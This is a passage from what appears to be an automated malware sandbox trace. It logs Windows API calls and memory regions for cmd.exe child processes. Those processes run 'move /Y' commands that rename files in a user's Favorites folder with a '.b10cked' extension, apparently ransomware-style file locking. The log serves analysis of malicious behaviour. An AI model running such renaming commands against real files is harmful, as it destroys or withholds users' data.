_MaxCount=0x7) returned -18 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0213.748] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0213.748] _wcsicmp (_String1="MICROS~3.URL", _String2=".") returned 63 [0213.748] _wcsicmp (_String1="MICROS~3.URL", _String2="..") returned 
63 [0213.749] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~3.url")) returned 0x20 [0214.035] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.035] SetErrorMode (uMode=0x0) returned 0x0 [0214.035] SetErrorMode (uMode=0x1) returned 0x0 [0214.035] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", nBufferLength=0x104, lpBuffer=0x20e9fc, lpFilePart=0x20e9e4 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", lpFilePart=0x20e9e4*="MICROS~3.URL") returned 0x2f [0214.035] SetErrorMode (uMode=0x0) returned 0x1 [0214.035] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x12 [0214.035] _wcsicmp (_String1="MICROS~3.URL", _String2=".") returned 63 [0214.035] _wcsicmp (_String1="MICROS~3.URL", _String2="..") returned 63 [0214.036] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL" (normalized: "c:\\users\\default\\favori~1\\micros~1\\micros~3.url")) returned 0x20 [0214.036] SetErrorMode (uMode=0x0) returned 0x0 [0214.036] SetErrorMode (uMode=0x1) returned 0x0 [0214.036] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", nBufferLength=0x104, lpBuffer=0x20ee78, lpFilePart=0x20ec10 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", lpFilePart=0x20ec10*="MICROS~3.URL") returned 0x2f [0214.036] SetErrorMode (uMode=0x0) returned 0x1 [0214.036] SetErrorMode (uMode=0x0) returned 0x0 [0214.036] SetErrorMode (uMode=0x1) returned 0x0 [0214.036] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", nBufferLength=0x104, lpBuffer=0x20f080, lpFilePart=0x20ec10 | out: 
lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", lpFilePart=0x20ec10*="Microsoft At Work.url.b10cked") returned 0x40 [0214.036] SetErrorMode (uMode=0x0) returned 0x1 [0214.036] SetLastError (dwErrCode=0x0) [0214.036] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url.b10cked")) returned 0xffffffff [0214.036] GetLastError () returned 0x2 [0214.036] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", fInfoLevelId=0x1, lpFindFileData=0x20e58c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e58c) returned 0x3d0ef0 [0214.036] FindNextFileW (in: hFindFile=0x3d0ef0, lpFindFileData=0x20e58c | out: lpFindFileData=0x20e58c) returned 0 [0214.037] GetLastError () returned 0x12 [0214.037] FindClose (in: hFindFile=0x3d0ef0 | out: hFindFile=0x3d0ef0) returned 1 [0214.038] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL", fInfoLevelId=0x1, lpFindFileData=0x3e1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1c30) returned 0x3d0ef0 [0214.038] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", nBufferLength=0x104, lpBuffer=0x20e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked", lpFilePart=0x0) returned 0x40 [0214.038] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url", nBufferLength=0x104, lpBuffer=0x20e824, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url", lpFilePart=0x0) returned 0x38 [0214.038] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url")) 
returned 0x20 [0214.038] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\micros~1\\microsoft at work.url.b10cked"), dwFlags=0x3) returned 1 [0214.039] FindClose (in: hFindFile=0x3d0ef0 | out: hFindFile=0x3d0ef0) returned 1 [0214.039] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20e7d8 | out: _Buffer=" 1") returned 9 [0214.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.039] GetFileType (hFile=0x7) returned 0x2 [0214.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e764 | out: lpMode=0x20e764) returned 1 [0214.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e798 | out: lpConsoleScreenBufferInfo=0x20e798) returned 1 [0214.039] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0214.040] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20e7d8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0214.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e7bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20e7bc*=0x1a) returned 1 [0214.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.040] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.040] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) 
returned 1 [0214.040] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.040] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.040] SetConsoleInputExeNameW () returned 0x1 [0214.040] GetConsoleOutputCP () returned 0x1b5 [0214.041] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.041] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.041] exit (_Code=0) Process: id = "527" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x134" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31419 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31420 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31421 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31422 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 31423 start_va = 
0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31424 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31425 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31426 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31427 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 31428 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31604 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31605 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31606 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31607 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 31608 start_va = 0x790000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 31609 start_va = 0x6ee80000 end_va = 0x6ee86fff 
entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31610 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31611 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31612 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31613 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31614 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31615 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31616 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31617 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31618 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31619 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31620 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31621 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 31622 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 31623 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31624 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 31625 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 31626 start_va = 0x5b0000 end_va = 0x712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 31627 start_va = 0x7a0000 end_va = 0x139ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Thread: id = 728 os_tid = 0xa80 [0214.223] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf99c | out: lpSystemTimeAsFileTime=0x2cf99c*(dwLowDateTime=0xb47c80c0, dwHighDateTime=0x1d440a9)) [0214.223] GetCurrentProcessId () returned 0x134 [0214.223] GetCurrentThreadId () returned 0xa80 [0214.223] GetTickCount () returned 0x3c013 [0214.223] QueryPerformanceCounter (in: 
lpPerformanceCount=0x2cf994 | out: lpPerformanceCount=0x2cf994*=27101255120) returned 1 [0214.224] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0214.224] __set_app_type (_Type=0x1) [0214.224] __p__fmode () returned 0x76b331f4 [0214.224] __p__commode () returned 0x76b331fc [0214.224] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0214.224] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0214.225] GetCurrentThreadId () returned 0xa80 [0214.225] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa80) returned 0x38 [0214.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0214.225] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0214.225] SetThreadUILanguage (LangId=0x0) returned 0x409 [0214.225] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0214.225] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf92c | out: phkResult=0x2cf92c*=0x0) returned 0x2 [0214.225] VirtualQuery (in: lpAddress=0x2cf963, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, 
State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0214.225] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf8fc, dwLength=0x1c | out: lpBuffer=0x2cf8fc*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0214.225] GetConsoleOutputCP () returned 0x1b5 [0214.225] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0214.226] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0214.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.226] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0214.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.226] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0214.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.226] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0214.226] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.226] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0214.226] _get_osfhandle (_FileHandle=0) returned 0x3 [0214.226] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0214.227] GetEnvironmentStringsW () returned 0x4c01b0* [0214.227] FreeEnvironmentStringsW (penv=0x4c01b0) returned 1 [0214.227] GetEnvironmentStringsW () returned 0x4c01b0* [0214.227] FreeEnvironmentStringsW (penv=0x4c01b0) returned 1 [0214.227] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce89c | out: phkResult=0x2ce89c*=0x40) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0xe8, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x0, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.227] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.227] RegCloseKey (hKey=0x40) returned 0x0 [0214.227] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce89c | out: phkResult=0x2ce89c*=0x40) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce8a4, 
lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x40, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x1, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x0, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x9, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x4, lpData=0x2ce8a8*=0x9, lpcbData=0x2ce8a0*=0x4) returned 0x0 [0214.228] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce8a4, lpData=0x2ce8a8, lpcbData=0x2ce8a0*=0x1000 | out: lpType=0x2ce8a4*=0x0, lpData=0x2ce8a8*=0x9, lpcbData=0x2ce8a0*=0x1000) returned 0x2 [0214.228] RegCloseKey (hKey=0x40) returned 0x0 [0214.228] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b0 [0214.228] srand (_Seed=0x5b8863b0) [0214.228] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"" [0214.228] GetCommandLineW () 
returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft Store.url.b10cked\"" [0214.228] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.229] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0214.229] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.229] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.229] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.229] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0214.229] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0214.229] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0214.229] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0214.229] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0214.229] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0214.229] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0214.229] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0214.229] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0214.229] GetEnvironmentStringsW () returned 0x4c2300* [0214.229] FreeEnvironmentStringsW (penv=0x4c2300) returned 1 [0214.229] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0214.229] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0214.229] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0214.230] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0214.230] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0214.230] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0214.230] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0214.230] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0214.230] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0214.230] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0214.230] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf668 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0214.230] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf668, lpFilePart=0x2cf664 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf664*="Desktop") returned 0x18 [0214.230] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0214.230] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf3e4 | out: lpFindFileData=0x2cf3e4) returned 0x4c0040 [0214.230] FindClose (in: hFindFile=0x4c0040 | out: hFindFile=0x4c0040) returned 1 [0214.230] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", 